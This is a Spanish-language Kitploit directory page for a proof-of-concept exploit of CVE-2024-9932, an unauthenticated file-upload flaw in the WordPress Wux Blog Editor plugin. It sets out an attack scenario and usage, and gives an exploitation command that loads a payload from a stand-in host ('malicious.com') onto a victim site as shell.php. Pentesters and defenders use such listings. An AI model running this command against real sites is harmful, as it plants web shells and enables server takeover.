Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-9932-POC — Exploit de prueba de concepto para CVE-2024-9932, una vulnerabilidad de carga arbitraria de archivos sin autenticación en el plugin Wux Blog Editor de WordPress, que permite la ejecución remota de código mediante la carga de archivos maliciosos. | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2024-9932-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2024-9932-poc

CVE-2024-9932-POC

Exploit de prueba de concepto para CVE-2024-9932, una vulnerabilidad de carga arbitraria de archivos sin autenticación en el plugin Wux Blog Editor de WordPress, que permite la ejecución remota de código mediante la carga de archivos maliciosos.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 1 añoAún no revisado

CVE-2024-9932-POC

Descripción:

El plugin Wux Blog Editor para WordPress es vulnerable a la subida arbitraria de archivos debido a una validación insuficiente del tipo de archivo en la función wuxbt_insertImageNew. Las versiones hasta la 3.0.0 inclusive están afectadas. Esta vulnerabilidad permite a atacantes no autenticados subir archivos arbitrarios al servidor, lo que potencialmente puede conducir a la ejecución remota de código (RCE).

Detalles de la vulnerabilidad

La vulnerabilidad se origina por una validación incorrecta del tipo de archivo en la función wuxbt_insertImageNew. Esto permite a atacantes subir archivos maliciosos al servidor sin autenticación.

Escenario de ataque:

  1. El atacante identifica un sitio web que utiliza el plugin vulnerable.
  2. Explota la funcionalidad de subida de archivos para cargar un shell PHP malicioso.
  3. Ejecuta comandos en el servidor comprometido.

Uso

root@kitploit:~
usage:CVE-2024-9932.py [-h] -u URL -ur REMOTE_URL [-n NAME]

Wux Blog Editor - Subida Arbitraria de Archivos

options:
  -h, --help            Muestra este mensaje de ayuda y sale
  -u URL, --url URL     URL base del servidor WordPress, por ejemplo, http://192.168.100.74/wordpress
  -ur REMOTE_URL,       --remote-url REMOTE_URL
                        URL del archivo remoto, por ejemplo, http://192.168.100.54/shell.txt
  -n NAME, --name NAME  Nombre de archivo deseado, por ejemplo, Nxploit.php

Comando de explotación

root@kitploit:~
python CVE-2024-9932.py -u http://victim-site.com/wordpress -ur http://malicious.com/payload.txt -n shell.php

Resultados

Ejemplo de subida exitosa

1- Archivo encontrado:

2- Resultado de la ejecución: Navegue a la URL del archivo para ejecutar el payload.

root@kitploit:~
[+] Archivo encontrado: http://192.168.100.74/wordpress/wp-content/uploads/2025/01/shell.php

Aviso legal

Esta herramienta es solo para fines educativos. El uso no autorizado de este script en sistemas sin permiso es ilegal.

Descargar herramienta